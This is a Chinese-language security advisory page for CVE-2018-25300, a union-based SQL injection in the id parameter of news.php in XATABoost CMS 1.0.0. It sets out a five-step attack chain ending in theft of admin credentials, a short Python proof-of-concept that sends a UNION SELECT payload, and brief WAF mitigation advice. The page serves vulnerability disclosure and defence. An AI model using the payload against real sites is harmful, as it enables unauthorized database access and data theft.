CVE-2018-25300 CVSS 8.2 高危

CVE-2018-25300: XATABoost CMS SQL注入漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2018-25300

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

XATABoost CMS

漏洞概述

XATABoost CMS 1.0.0版本存在严重的基于联合的SQL注入漏洞。由于未对用户输入进行充分过滤，未经身份验证的攻击者可通过向news.php发送特制GET请求，在id参数注入恶意SQL代码。利用该漏洞可导致敏感数据库信息泄露，严重影响系统机密性。

技术细节

该漏洞的核心原因在于news.php文件在处理id参数时，直接将其拼接到SQL查询语句中，缺乏有效的安全过滤机制，如预处理语句或输入验证。攻击者无需经过身份认证（PR:N），即可通过网络向受影响端点发送包含UNION SELECT语句的恶意Payload。由于应用未对输入进行转义，数据库会执行攻击者构造的恶意SQL指令。攻击者可以利用此漏洞读取数据库中的敏感信息，如管理员密码哈希、用户个人信息等。该漏洞利用难度低（AC:L），无需用户交互（UI:N），且对机密性影响高（C:H），属于高危漏洞。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标服务器运行的是XATABoost CMS，并定位到news.php接口。

STEP 2

2. 武器化

攻击者构造基于UNION的SQL注入Payload，旨在提取数据库结构或敏感数据。

STEP 3

3. 投递

攻击者向目标服务器发送包含恶意id参数的GET请求：GET /news.php?id=1 UNION SELECT...

STEP 4

4. 利用

后端数据库执行了攻击者注入的SQL语句，将查询结果返回给攻击者。

STEP 5

5. 渗出

攻击者分析HTTP响应，提取泄露的敏感信息（如管理员凭证）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def verify_sqli(target_url):
    """
    PoC for CVE-2018-25300
    Checks for SQL Injection in XATABoost CMS news.php
    """
    # Payload tries to cause a time delay or specific output to confirm injection
    # Using a simple UNION based payload for detection
    payload = "1 UNION SELECT NULL, NULL, NULL-- -"
    
    params = {
        "id": payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {target_url}")
            print(f"[+] Payload: {payload}")
            print("[+] Check response manually for database errors or data leakage")
            return True
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
    return False

if __name__ == "__main__":
    target = "http://example.com/news.php" # Replace with actual target
    verify_sqli(target)

影响范围

XATABoost CMS 1.0.0

防御指南

临时缓解措施

在未修复漏洞前，建议在Web应用防火墙（WAF）中部署规则，拦截针对news.php参数的SQL注入攻击尝试；若该功能非必须，可临时禁用news.php页面的访问权限以降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2018-25300
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2018-25300
3 Details https://www.cvedetails.com/cve/CVE-2018-25300/
4 VulDB https://vuldb.com/cve/CVE-2018-25300
5 Link http://www2.xataboost.com
6 Link https://www.exploit-db.com/exploits/44622
7 Link https://www.vulncheck.com/advisories/xataboost-cms-sql-injection-via-news-php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表